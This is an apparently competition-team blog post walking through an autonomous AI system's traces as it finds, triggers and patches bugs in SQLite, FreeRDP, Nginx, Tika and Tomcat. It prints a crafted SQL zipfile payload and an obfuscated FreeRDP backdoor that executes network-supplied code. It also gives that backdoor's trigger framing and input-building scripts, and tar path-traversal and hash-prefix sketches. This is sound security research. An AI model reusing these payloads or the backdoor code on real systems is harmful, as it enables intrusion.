Inside the brain of a hacking robot: Exploring traces | AI Cyber Challenge

Agent trajectory walkthroughs of a fully autonomous hacking system

Aug 08, 2025

Contents

Introduction
SQLite
FreeRDP
Nginx
Apache Tika
Apache Tomcat
Conclusion

Introduction

Building LLM agents to solve complex security tasks is, unfortunately, still complicated and takes a lot of human effort. Fortunately, LLM agents offer a wonderful vantage point for introspecting their work compared to other techniques like fuzzing or formal methods. To gain insight into the strengths and limitations of LLMs, we can simply read through the agent log trajectories! In this blog we will go through a few logs that we’ve selected (the logs for all our testing runs total over a hundred gigabytes, and some contain bugs not yet patched by vendors) and point out some interesting features.

Keep in mind that in all of these cases, the only input our CRS (cyber reasoning system) had was the code repository (without commit history), and there was no human intervention to select, triage, or prioritize bugs. Further, the POVs (proofs of vulnerability) crafted here were all produced without human input, and without input from fuzzers.

SQLite

The first traces we will examine come from SQLite. SQLite is a lightweight database engine written in C, at around 330k lines of code, that has been in development since 2000. SQLite is incredibly popular and used by a huge body of other software: operating systems such as Windows, Mac OS, and several flavors of Linux, all major web browsers, cars, planes, and of course most importantly, our CRS itself!

During an AIxCC practice round, we were given a version of SQLite with a harness that allowed running arbitrary SQL queries. The organizers had injected some bugs, which we identified, but what was more interesting for us were the bugs the organizers did NOT inject. Our LLM agents actually found lots of unintended ways to crash it, though most of them were not security critical. However, at least two of them were! These were fixed by SQLite on August 5th.

Out-of-bounds Write

This bug is a basic heap buffer-overflow inside of the zipfile extension in SQLite, which is enabled by default. This is a pretty interesting case because this sort of bug would be incredibly difficult to find through fuzzing without knowing to target this specific pattern.

This is one of the few traces where we include the VulnAnalyzer agent. This agent runs early on in the pipeline to take a low-confidence bug report, verify it, and then enrich it with more detailed information to help downstream processes. In this case we can see it is crucial—with the enriched bug report, triggering this buffer overflow is actually easy!

As with all our POV attempts, we run 3 agents in parallel on the task to minimize latency (as it is a factor in scoring for the game). For this trace we included all of them, though we see two are quickly terminated as the last one succeeds. Unfortunately the successful log itself is a bit unsatisfying: the output is too large to display as a tool message as it uses 64k ‘A’ characters as part of its overflow. The actual stack trace logged from our system (inside our own SQLite database!) was

==43==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x53100004c878 at pc 0x55675809c407 bp 0x7ffe3401f750 sp 0x7ffe3401f748
WRITE of size 1 at 0x53100004c878 thread T0
SCARINESS: 31 (1-byte-write-heap-buffer-overflow)
Stack Frame #0 in zipfilePutU16 shell.c
Stack Frame #1 in zipfileSerializeLFH shell.c
Stack Frame #2 in zipfileAppendEntry shell.c
Stack Frame #3 in zipfileUpdate shell.c
Stack Frame #4 in sqlite3VdbeExec sqlite3.c
Stack Frame #5 in sqlite3Step sqlite3.c
Stack Frame #6 in sqlite3_step (/out/customfuzz3+0x391914)
Stack Frame #7 in exec_prepared_stmt shell.c
Stack Frame #8 in shell_exec shell.c
Stack Frame #9 in shell_main (/out/customfuzz3+0x8ba51f)
Stack Frame #10 in LLVMFuzzerTestOneInput (/out/customfuzz3+0x372b2b)
Stack Frame #11 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerLoop.cpp:614:13
Stack Frame #12 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:327:6
Stack Frame #13 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:862:9
Stack Frame #14 in main /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerMain.cpp:20:10
Stack Frame #15 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16
Stack Frame #16 in _start (/out/customfuzz3+0x20a93d)

DEDUP_TOKEN: zipfilePutU16--zipfileSerializeLFH--zipfileAppendEntry--zipfileUpdate--sqlite3VdbeExec
0x53100004c878 is located 0 bytes after 65656-byte region [0x53100003c800,0x53100004c878)
allocated by thread T0 here:
Stack Frame #0 in malloc /src/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:68:3
Stack Frame #1 in sqlite3MemMalloc sqlite3.c
Stack Frame #2 in mallocWithAlarm sqlite3.c
Stack Frame #3 in sqlite3Malloc sqlite3.c
Stack Frame #4 in sqlite3_malloc64 (/out/customfuzz3+0x37959a)
Stack Frame #5 in zipfileConnect shell.c
Stack Frame #6 in vtabCallConstructor sqlite3.c
Stack Frame #7 in sqlite3VtabCallCreate sqlite3.c
Stack Frame #8 in sqlite3VdbeExec sqlite3.c
Stack Frame #9 in sqlite3Step sqlite3.c
Stack Frame #10 in sqlite3_step (/out/customfuzz3+0x391914)
Stack Frame #11 in exec_prepared_stmt shell.c
Stack Frame #12 in shell_exec shell.c
Stack Frame #13 in shell_main (/out/customfuzz3+0x8ba51f)
Stack Frame #14 in LLVMFuzzerTestOneInput (/out/customfuzz3+0x372b2b)
Stack Frame #15 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerLoop.cpp:614:13
Stack Frame #16 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:327:6
Stack Frame #17 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:862:9
Stack Frame #18 in main /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerMain.cpp:20:10
Stack Frame #19 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16

DEDUP_TOKEN: __interceptor_malloc--sqlite3MemMalloc--mallocWithAlarm--sqlite3Malloc--sqlite3_malloc64
SUMMARY: AddressSanitizer: heap-buffer-overflow shell.c in zipfilePutU16
Shadow bytes around the buggy address:
  0x53100004c580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x53100004c600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x53100004c680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x53100004c700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x53100004c780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x53100004c800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]
  0x53100004c880: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x53100004c900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x53100004c980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x53100004ca00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x53100004ca80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==43==ABORTING
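A report like this is easy to summarize mechanically. The sketch below is not our CRS code; it is a minimal illustration that assumes the "Stack Frame #N in func" line format shown above, and the function name summarize_asan and the five-frame token length are hypothetical choices. It extracts the bug type, the access kind, a dedup token built from the top crash frames, and checks that the reported region size agrees with the region bounds.

```python
import re

# Frame lines in the log above look like "Stack Frame #0 in zipfilePutU16 shell.c".
FRAME = re.compile(r"^Stack Frame #\d+ in (\S+)")


def summarize_asan(report, token_frames=5):
    """Extract headline facts from an AddressSanitizer report (illustrative only)."""
    bug = re.search(r"ERROR: AddressSanitizer: (\S+)", report)
    access = re.search(r"^(READ|WRITE) of size (\d+)", report, re.MULTILINE)
    region = re.search(
        r"(\d+)-byte region \[(0x[0-9a-f]+),(0x[0-9a-f]+)\)", report
    )

    # Collect only the first contiguous run of frames: that is the crash stack.
    # Later runs (for example the allocation stack) are ignored.
    frames = []
    for line in report.splitlines():
        match = FRAME.match(line)
        if match:
            frames.append(match.group(1))
        elif frames:
            break

    consistent = None
    if region:
        size = int(region.group(1))
        start = int(region.group(2), 16)
        end = int(region.group(3), 16)
        consistent = (end - start) == size

    return {
        "bug_type": bug.group(1) if bug else None,
        "access": (access.group(1), int(access.group(2))) if access else None,
        "dedup_token": "--".join(frames[:token_frames]),
        "region_size_consistent": consistent,
    }
```

For the trace above, the region bounds give 0x53100004c878 - 0x53100003c800 = 0x10078 = 65656 bytes, which matches the reported size, and the faulting address equals the end of the region, so the 1-byte write lands immediately past the buffer.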

We can also see how our system attempts to patch this. The first attempt was made before we had produced a POV: our system was confident this was a real vulnerability, and once again we wanted to minimize latency to increase our score in the competition. However, after the POV was created, the system realized the patch was not complete and tried again, this time with a testcase to test against.

Out-of-bounds Read

Another overflow was identified by our system in the same area of code, but along a different bug path. This time the bug involves loading and reading a corrupted zip file. Once again, this is the type of bug that would be quite difficult to fuzz! It involves not only a crafted SQL query, but also a properly formatted and specially crafted zip file which is hex encoded.

This time the VulnAnalyzer agent does a pretty good job describing the bug, but the POV producer (once again one of three racing) needed to do a bit more work to understand how to load a virtual zipfile inside of SQLite, and how exactly the zipfile must be crafted. In the end the SQL query it produces is

SELECT * FROM zipfile(X'504b03041400000000000000000000000000100000001000000001000100414243434343504b010214001400000000000000000000000000ffff0000ffff000001000000000000000000000000000000000041504b050600000000010001002f000000240000000000');

This time the patching that launched in parallel before the POV was complete did not need to be restarted.
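To see what the agent actually crafted, the hex literal from the query can be unpacked with Python's struct module. This is a reader-side sketch rather than anything from our system: the function name describe_zip is hypothetical, and the field layouts follow the standard ZIP record formats (local file header, central directory entry, end-of-central-directory record). It reports the sizes each record declares next to the number of data bytes actually present, which is where a crafted archive would be expected to disagree with itself. The literal visibly contains two 0xffff size fields even though the whole archive is only about a hundred bytes long.

```python
import struct

# Hex literal copied from the SQL query above.
HEX = (
    "504b03041400000000000000000000000000100000001000000001000100414243434343"
    "504b010214001400000000000000000000000000ffff0000ffff0000010000000000000000"
    "00000000000000000041504b050600000000010001002f000000240000000000"
)
blob = bytes.fromhex(HEX)


def describe_zip(buf):
    """Decode the three ZIP records and compare declared sizes with reality."""
    cd_off = buf.find(b"PK\x01\x02")    # central directory entry
    eocd_off = buf.find(b"PK\x05\x06")  # end-of-central-directory record

    # Local file header: 30 fixed bytes, little-endian.
    lfh = struct.unpack_from("<4s5H3I2H", buf, 0)
    # Central directory entry: 46 fixed bytes.
    cd = struct.unpack_from("<4s6H3I5H2I", buf, cd_off)
    # End-of-central-directory record: 22 fixed bytes.
    eocd = struct.unpack_from("<4s4H2IH", buf, eocd_off)

    name_len, extra_len = lfh[9], lfh[10]
    return {
        "total_bytes": len(buf),
        "local_declared_sizes": (lfh[7], lfh[8]),      # compressed, uncompressed
        "central_declared_sizes": (cd[8], cd[9]),      # compressed, uncompressed
        "data_bytes_present": cd_off - (30 + name_len + extra_len),
        "cd_offset_declared": eocd[6],
        "cd_offset_actual": cd_off,
    }


if __name__ == "__main__":
    for key, value in describe_zip(blob).items():
        print(f"{key}: {value}")
```

Comparing the declared sizes against data_bytes_present and total_bytes gives a quick feel for how far past the real data a parser that trusts the headers would try to read.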

FreeRDP

Next, let’s look at FreeRDP. If you aren’t familiar with it, their website describes FreeRDP as “a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license”. It is a C codebase of around 500k lines that has been under active development since 2011. It provides both RDP client and RDP server capabilities, and is used by other RDP tools such as Remmina, which ships with Ubuntu.

Synthetic Backdoor

During an AIxCC practice round, we were given a sample of FreeRDP with some bugs inserted. One of them is an obfuscated backdoor.

In some debug notes not available to our system, the authors of this challenge problem wrote:

This vulnerability is backdoor, hidden within an obfuscated & hidden application tag message, when triggered allows an arbitrary memory write; this is intented to be hard for an CRS to understand what is happening within it. This vulnerability should be difficult to build an affective payload to demonstrate the vulnerability, but relatively easy to patch.

The actual code for the bug is something like

diff a/libfreerdp/core/mcs.c b/libfreerdp/core/mcs.c
--- a/libfreerdp/core/mcs.c
+++ b/libfreerdp/core/mcs.c
@@ -911,16 +911,6 @@ BOOL mcs_recv_connect_response(rdpMcs* mcs, wStream* s)
 	if (!tpdu_read_data(s, &li, tlength))
 		return FALSE;
 
+	if (ber_read_application_tag(s, 0x42, &length))
+	{
+		#define A size_t 
+		#define B void 
+		A/*AOB,1rI<o2iKHfFJ*/a/*vnM 8Iv"b^Z[=&&9[12(bW*/=/*q!fYBcH$U?1JH0[qX@DlBtA*/0/*e+Co)nj?,*/;/*zjY9_9fJH)_ C}'dYLw|iX :o=*/A/*q?P@uK?Nu$e.%"Br*/f/*Q^4$n*/=/*x?UdG8b($5Id>7M4TgyIgC"Yfp=wv4^uS*/1<<0xc/*F.z}JtF#I_pZlT*/;/*n@KQd$n$E(YKr@ <-jYA#bKZ*/B*/*GW:mGM(*/b/*gERD0u4BU'O_)3*/;/*lk+gFuS7i6{A9Iv"]*//*ceq0i q1;rNs<tOCSUT*/if (posix_memalign/*uK3WW_YvZN{a10*/(&b,/*p7H|>r6v(^CK:xjf$][<};(Cn*/1<<0x9,/*F8W0gnG7hxQp?}4boF8N:438QgC*/f)/*N&N%HGu<,5vS N5OV^XF*/){return(0);};/*Bz{dVPE5A6eJpUMaX8Nl]GxT(rU*/A*/*LnztTqEE[)C*/c/*r^J;HOHG>SwY=H#s[HDz]N,ju{w|B*/=/*rx![HTZwE::sA&*/(A*)b/*Ki%P|3*/;/*zllh;'vu#og_pS;19Jlyp{|YYu*//*MwOX]g2hS(@knC7*/if(mprotect/*A$zFedaEmFJ$*/((B*)(((A)c)&(~0xfff)),/*d4E}Im'gWCsj%)-U3o[vq%a=X!*/f,/*n$wds'3jhIeAxs%)q$KGlA([Gb*/7)/*mKgBwh{u):O3WUcLH^uGHtq*/){return(0);};/*b]c+RpPVn$Px^;!r]M*/A/*wdSQd CLS1.>R^Q9LKVh:!*/d/*P8+2&YDiaJ?Zg]DBesXG(c0L"a*/;/*DI;(]E*/for/*O2#N21utWq,3 Y:JNj92>x*/(a=0;/*faU;Y$xK.[4|p;N*/a/*S?p1$Ef|x:2K_)3x-xbI;k*/</*V3K!Hf1|Wr1Ts=x"2,*/length/8;/*Y1bBgb-f#kB<HSG*/a++)/*Jznf%x1UV?o$a{;ZuBi?R+O*/{/*uo@lho{Vr9wo3)B%cK7I1o}.*/Stream_Read_UINT64_BE(s,/*htxpI4o#)WdBr^706Q,MI<i{g-pPo}*/d)/*Ne9@w-TzlEB'(fQydF*/;/*xL;Z}xffT)VD8iLPj(d4U!u*/c[a]/*dRtrW<,:*/=/*EiNHdr>d*/d/*ATgOpsR*/;/*P.{mJUU>*/}/*jB|Vm!}.UyNk9OVo]52$T4hvc5!Is*/B/*P^;9ni,z0IXa3#Qy*/(*e)()/*SG)+{5_Ql2{XUx]'D)1gdhO@*/=/*d5x<n[gd$(*/(B(*)())b/*N]k}F%B|c)6QNBnt{MBSaH5wwGCnq{p*/;e()/*sR'.ixaZj.0-<w,XWNw1bZ9 */;
+		return TRUE ;
+	} else {
+		Stream_Rewind(s, 2);
+	}
+
 	if (!ber_read_application_tag(s, MCS_TYPE_CONNECT_RESPONSE, &length) ||
 	    !ber_read_enumerated(s, &result, MCS_Result_enum_length) ||
 	    !ber_read_integer(s, &calledConnectId) ||

The good news is that even if this is a bit inscrutable, LLM-based bug detection on the code base easily flags this as a potential bug to investigate! After reading this code, our LLM system produces a bug report like:

name: Backdoor
reason: The function contains obfuscated code that allocates an executable memory region, copies data from the network stream into it, and then executes it. This is a backdoor allowing remote code execution on the client by a malicious server.
source: if (ber_read_application_tag(s, 0x42, &length))

Of course, our system produces lots of bug reports, so before we go further with this one, we pass it through filtering steps to weed out false positives. Our first step is the VulnClassifier, which quickly and very cheaply (just $0.004!) judges this as a plausible report, giving it the maximum score of 100% for being a likely bug. That bug, along with other high-scoring reports, is sent off to our VulnAnalyzer agent, which has access to source browsing tools to attempt to understand the code better.

This is a fairly straightforward process that most human security researchers would perform. The LLM agent, based on OpenAI’s o4-mini model, looks at the surrounding code and traces the path from the vulnerable code up to the test harness in TestFuzzCoreClient.c. You can view the whole trace here. The first takeaway is that this agent is relatively inexpensive. It took about $0.80 to look at the vulnerability, decide whether it was a valid report or a false positive, and also provide us with a lot more detail about the specifics. In the end its more detailed description was:

  <function>mcs_recv_connect_response</function>
  <file>FreeRDP/libfreerdp/core/mcs.c</file>
  <description>
    A hidden branch activated by BER application tag 0x42 that allocates an RWX memory buffer,
    copies attacker‐supplied bytes into it, and jumps to it, enabling immediate crashes or
    remote code execution.
  </description>
  <conditions>
    Input must be fed to freerdp_is_valid_mcs_create_response (e.g. TestFuzzCoreClient):
    1) TPKT header: [0x03,0x00,lenH,lenL] with total len>=7.
    2) X.224 Data TPDU: [LI,0xF0,0x80].
    3) BER extended application tag: [0x7F,0x42].
    4) BER length (e.g. 0x08 for an 8-byte payload, or >0x1000 to overflow).
    5) At least that many payload bytes follow.
    This causes mcs_recv_connect_response to take the backdoor path, copy and mprotect the
    payload as code, and execute it, crashing under ASAN/UBSAN.
  </conditions>

Already this is a much more actionable and useful report for a human. But of course, we don’t get humans in AIxCC! So we instead pass this report off to yet another LLM agent. In this case, we want to try to write an input to trigger this bug, so we launch a PovProducer, whose trace you can find here. (Actually, our system launches 3 PovProducer agents in parallel, but the other two are terminated once the first one succeeds.) Overall the CRS is able to handle this backdoor quite easily! There is a bit of trickiness around the BER extended application tag, but once that is settled, the target crashes.
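The framing listed in the enriched report can be written down in a few lines of Python. The sketch below only assembles the layers the report names (TPKT header, X.224 Data TPDU, BER application tag 0x7F 0x42, BER length, payload). It is not the input our agent produced, it has not been checked against the harness, and the helper names, the LI value of 2, and the all-zero placeholder payload are assumptions made for illustration.

```python
import struct


def ber_length(n):
    """Encode a BER length: short form below 0x80, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def build_framed_input(payload):
    """Wrap a payload in the layers named in the report (illustrative only)."""
    # X.224 Data TPDU: length indicator, DT code 0xF0, EOT 0x80.
    # LI = 2 is the conventional value and is an assumption here.
    x224 = bytes([0x02, 0xF0, 0x80])
    # BER extended application tag from the report.
    tag = bytes([0x7F, 0x42])
    body = x224 + tag + ber_length(len(payload)) + payload
    # TPKT header: version 3, reserved 0, big-endian total length (header included).
    tpkt = struct.pack(">BBH", 3, 0, 4 + len(body))
    return tpkt + body


if __name__ == "__main__":
    # Eight placeholder bytes, matching the 8-byte example length in the report.
    packet = build_framed_input(bytes(8))
    print(packet.hex())
```

The two-byte form of the application tag (0x7F followed by the tag number) is the part the agent had to get right before the hidden branch was taken.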

Unfortunately, we get a very unsatisfying “Tool call output was too large to return. Please try another approach.” message when the target crashes. The FreeRDP test harness outputs about 60kB of data when executing this input, which our backend code refuses to send to the agent for fear of polluting the context window. Luckily, that same backend code detects the crash occurred, logs the input, and halts the agent.
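The behavior described here, where oversized output is withheld from the agent while the crash is still detected, can be sketched as follows. This is a simplified illustration and not our backend code: the names ToolResult and handle_run, the 16,000-character limit, and the sanitizer patterns are all assumptions.

```python
import re
from dataclasses import dataclass

# Hypothetical limit; the real threshold in our backend is not stated here.
MAX_TOOL_OUTPUT = 16_000
TOO_LARGE = "Tool call output was too large to return. Please try another approach."

# Assumed crash markers: sanitizer error and summary lines.
CRASH = re.compile(r"ERROR: AddressSanitizer|SUMMARY: \w+Sanitizer")


@dataclass
class ToolResult:
    message: str   # what the agent gets to see
    crashed: bool  # what the backend records, independent of the message


def handle_run(raw_output, limit=MAX_TOOL_OUTPUT):
    """Detect crashes on the full output, then decide what the agent sees."""
    crashed = bool(CRASH.search(raw_output))
    message = TOO_LARGE if len(raw_output) > limit else raw_output
    return ToolResult(message=message, crashed=crashed)
```

The key design point is the ordering: crash detection runs on the raw output before any size check, so protecting the context window never hides a successful POV from the rest of the system.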

Unintended Integer Overflow

While it is nice to see that our system can find and trigger intended, synthetic bugs, the goal is to find real software vulnerabilities. Fortunately, this challenge provided us with a great example. In addition to the synthetic vulnerabilities, our system spotted other bugs in the FreeRDP code. After some investigation, we realized one of these is a bug that was fixed upstream after the AIxCC test project was forked (and after the knowledge cutoff for our model). Luckily this also means we don’t need to wait for disclosures before we can talk about it!

This bug is a signed integer overflow in the RDP T.124 Generic Conference Control handling when reading client monitor information. Notably, we never surfaced this vulnerability while fuzzing with libFuzzer on many cores for many hours across many test runs, even when starting with a corpus of seeds from upstream OSS-Fuzz. In fact, the only time we observed any code in the Generic Conference Control handling being exercised was when an LLM crafted inputs to it.

Upon review of some of our test runs, we found that our system had actually spotted this bug multiple times (though it rarely triggered it successfully). In this case, the bug report sent to our system was surfaced by static analysis using Infer, and was a bit minimal:

Vulnerability in gcc_read_client_monitor_data in FreeRDP/libfreerdp/core/gcc.c:
Vulnerability site: gcc_read_client_monitor_data on line 2150
Vulnerability type: Integer Overflow
Qualifier: ([-inf, +inf] - [-inf, +inf]):signed32

This is a much more interesting and challenging example than the intended vulnerability. We see that the system starts off very methodically following a normal set of steps:

Get more details about the nature of the bug (by spawning a SourceQuestions sub-agent)
Figure out which of the several harnesses can actually reach the code in question (by again spawning a SourceQuestions sub-agent)
Ask for an input-encoder for the relevant harness (though it turns out to be quite bare-bones)
Develop and debug the input

The last step is, understandably, where most of the effort is spent. Interestingly, the agent doesn’t jump into attempting a POV immediately. First it “realizes” this is going to be a difficult task, saying “Given the complexity of manually crafting the full MCS Connect-Initial PDU, let me try a different approach. Let me check if there are any simpler ways to reach this function or if there are existing malformed test cases I can modify” and requests examples or test cases (which unfortunately fails).

Next, rather than attempting to trigger the integer overflow right away, it simply tries some tests, saying: “Let me try to create a minimal test to see what happens”. Definitely behavior to which humans can relate!

Looking at these logs we also see some issues with our sub-agents. Specifically, several calls to the SourceQuestions sub-agent error out with “no response was produced”, which means the sub-agent did not terminate in the allowed number of turns. Some prompting to address this was added in later versions of our system, but the LLM is still able to work around those deficiencies here, usually by rephrasing its question to be simpler or more specific.

This is one of the amazing (and frustrating) things with agents: they may succeed even if there are bugs the LLM needs to overcome. This makes them a great tool for ambiguous or complicated tasks, but it also makes evaluations more difficult, as success alone is not a sufficient indicator of overall health.

Still, reading through this agent trace we see that overall the system is doing a great job cooperating among the agents. As the main PovProducer is building up its input, it asks some fairly vague questions to the DynamicDebug agent, such as

Does this input reach the gcc_read_client_monitor_data function? What errors or issues occur during parsing?

Fortunately, the response is very helpful, not only answering the question, but also providing a recommendation of how to fix the parsing issues:

The PoV does not reach gcc_read_client_monitor_data because it fails early in the parsing process, specifically at the object identifier check in gcc_read_conference_create_request. The function fails when trying to read the T.124 object identifier (t124_02_98_oid).

The issue is in the input construction: The GCC Conference Create Request requires a specific T.124 object identifier (0.0.20.124.0.1) to be present in the data, but looking at the data being processed (0x05, 0x00, 0x14, 0x7c, 0x01, 0x00...), this identifier is not properly encoded in the input. Instead, the input jumps directly to the GCC header data.

To fix this, the input needs to be modified to include the proper BER/PER encoding of the T.124 object identifier before the GCC header data. The current gcc_header value in the Python code should be preceded by the properly encoded object identifier.

This shows a fairly deep understanding of the code pathways in question. While the CRS was not given the ability to search for help on the internet due to competition rules, large models fortunately have enough background information to be able to answer questions about standard protocols by themselves.
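As a small illustration of the protocol knowledge involved, the object identifier named in the response (0.0.20.124.0.1) can be encoded with the standard ASN.1 rules: the first two arcs are combined into one octet as 40 * first + second, and each later arc is written in base 128 with the high bit set on every octet but the last. The sketch below implements only that generic rule. The function names are hypothetical, and whether FreeRDP expects exactly this framing around the identifier was not checked here.

```python
def encode_oid_content(arcs):
    """Encode OID arcs into ASN.1 content octets (generic rule, no tag)."""
    first, second, *rest = arcs
    # First two arcs share one octet. This simple form assumes the combined
    # value fits below 128, which holds for identifiers starting with 0 or 1.
    out = bytearray([40 * first + second])
    for arc in rest:
        # Base-128 digits, least significant first, then reversed.
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return bytes(out)


def encode_oid_with_length(arcs):
    """Prefix the content octets with a one-byte length."""
    content = encode_oid_content(arcs)
    return bytes([len(content)]) + content


if __name__ == "__main__":
    print(encode_oid_with_length((0, 0, 20, 124, 0, 1)).hex())
```

With a one-byte length prefix, this identifier starts with the bytes 05 00 14 7c, the same four bytes that open the data sequence quoted in the agent's response.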

Despite the complexity of the bug and the issues with the SourceQuestions sub-agent, after about $4.25 of LLM spend and 40 minutes, the agent successfully produces a POV for this bug. Very impressive for a non-trivial bug report, and very cool to see an example of an unknown bug being found and triggered without human intervention!

Nginx

Nginx is a popular webserver used by millions of websites around the world. It is a C codebase of around 250k lines, and has been under active development since it was first released in 2004. For our analysis, we used a version of the code derived from the release by the AIxCC organizers. This release has several intended vulnerabilities.

Although the traces for POVs are available for Nginx here, let’s move on to patching since we haven’t covered that yet.

Patches in our system are based on a diff-like format. This is a format that is widely used and thus present in lots of training data, but LLMs still struggle due to specifics of the diff format like line numbers. While in most cases we can use fuzzy matching to transparently handle any issues, sometimes that fails. For example, in this trace we can see the LLM repeatedly fail to apply a patch due to the fuzzy match failing as there is some repeated code that causes matches to be ambiguous. After reading through the surrounding code to get more context, the model tries a more complicated patch which again fails. Finally, four separate patches are made to different code regions, which eventually succeed.
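The ambiguity problem is easy to reproduce. The sketch below is not our patch applier; it is a minimal stand-in that assumes a hunk is located purely by its context lines, compared after collapsing whitespace, and the name locate_hunk is hypothetical. When the same context appears more than once in the file, it refuses to guess and reports every candidate position instead.

```python
def _normalize(line):
    """Collapse runs of whitespace so indentation differences do not matter."""
    return " ".join(line.split())


def locate_hunk(file_lines, context_lines):
    """Return the 0-based index where the context matches exactly once."""
    want = [_normalize(line) for line in context_lines]
    if not want:
        raise ValueError("a hunk needs at least one context line")
    have = [_normalize(line) for line in file_lines]

    hits = [
        i
        for i in range(len(have) - len(want) + 1)
        if have[i : i + len(want)] == want
    ]
    if not hits:
        raise LookupError("context not found in file")
    if len(hits) > 1:
        lines = [h + 1 for h in hits]
        raise LookupError(f"ambiguous context, matches at lines {lines}")
    return hits[0]
```

Adding more surrounding lines to the context is the usual way out of the ambiguous case, which is consistent with the model going back to read more of the surrounding code before retrying.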

Overall, these traces will probably look familiar to anyone who has used the agentic coding systems that are now very popular.

Apache Tika

Tika is a tool for extracting metadata and text from a huge number of different file types (images, documents, archives, and so on). Unlike the others here, it is a Java project, with about 215k lines of code.

For this, we have included every Tika-related POV trace from a test run. These are partitioned across 8 files to make it easier to browse. The first thing to note is that this is a lot. The other projects had similar numbers of attempts and total spend (hundreds of dollars) before being curated down. These logs include not just parallel attempts that were terminated due to successes, but also attempts that may be impossible due to build configs (if we believe the LLM’s assessment), or attempts on false-positive bug reports.

One particularly cool example is this. A report is given which tasks the POV producer with producing a zip file to trigger a runtime path traversal bug. First, we see that the POV producer can simply use native Python libraries for crafting zip files, which is much more efficient than fuzzing or crafting them byte-by-byte! Unfortunately, the agent encounters an issue: the zip file handling safely works around the path traversal. Undeterred, the agent keeps investigating and notices that it can instead trigger the bug by using specially crafted tar files! After the repeated failures against zip files, the agent targets a completely different harness and crafts a tar file input using Python’s tarfile library that works the first time! Although this isn’t necessarily a security-relevant bug, it would be scoreable in AIxCC if the runtime security checks fire.
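To give a sense of how little code this takes, here is a minimal sketch of building a tar archive in memory whose single member name contains parent-directory components. It is not the agent's actual input: the function name, member name, and contents are placeholders, and whether a given consumer resolves such a name outside its target directory depends entirely on that consumer.

```python
import io
import tarfile


def build_tar_with_member(member_name, data):
    """Return the bytes of a tar archive holding one member with the given name."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name=member_name)
        info.size = len(data)  # size must be set before adding file content
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def list_member_names(archive_bytes):
    """Read the archive back and list member names without extracting anything."""
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r") as tar:
        return tar.getnames()


if __name__ == "__main__":
    archive = build_tar_with_member("../../tmp/placeholder.txt", b"hello")
    print(list_member_names(archive))
```

Because the library handles headers, padding, and checksums, the agent can spend its effort on the one field that matters, which is hard to match with byte-level mutation.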

Apache Tomcat

Tomcat is a Java web application server, created in 1999 and still heavily used. It consists of around 420k lines of Java code. We created this example internally by injecting some of our own bugs into it.

Here we once again include all the POV producers. One fun thing here is a backdoor that we injected which is only triggered if a SHA-256 sum of some data has a certain prefix. This would be very difficult with fuzzing, but with our agents it is solvable!
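A hash-gated condition like this defeats mutation-based fuzzing because a near miss produces no feedback signal, but it is straightforward to satisfy by search once the check is understood. The sketch below shows the general idea only: the function name, the candidate format, and the three-hex-digit prefix are made up for illustration and do not reflect the actual condition in our injected backdoor.

```python
import hashlib
import itertools


def find_input_with_hash_prefix(prefix_hex, stem=b"pov-"):
    """Brute-force a byte string whose SHA-256 hex digest starts with prefix_hex."""
    for counter in itertools.count():
        candidate = stem + str(counter).encode()
        if hashlib.sha256(candidate).hexdigest().startswith(prefix_hex):
            return candidate


if __name__ == "__main__":
    # A 3-hex-digit prefix needs about 16**3 = 4096 attempts on average.
    found = find_input_with_hash_prefix("abc")
    print(found, hashlib.sha256(found).hexdigest())
```

The expected work grows by a factor of 16 per extra hex digit, so short prefixes are found almost instantly while long ones quickly become impractical.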

Conclusion

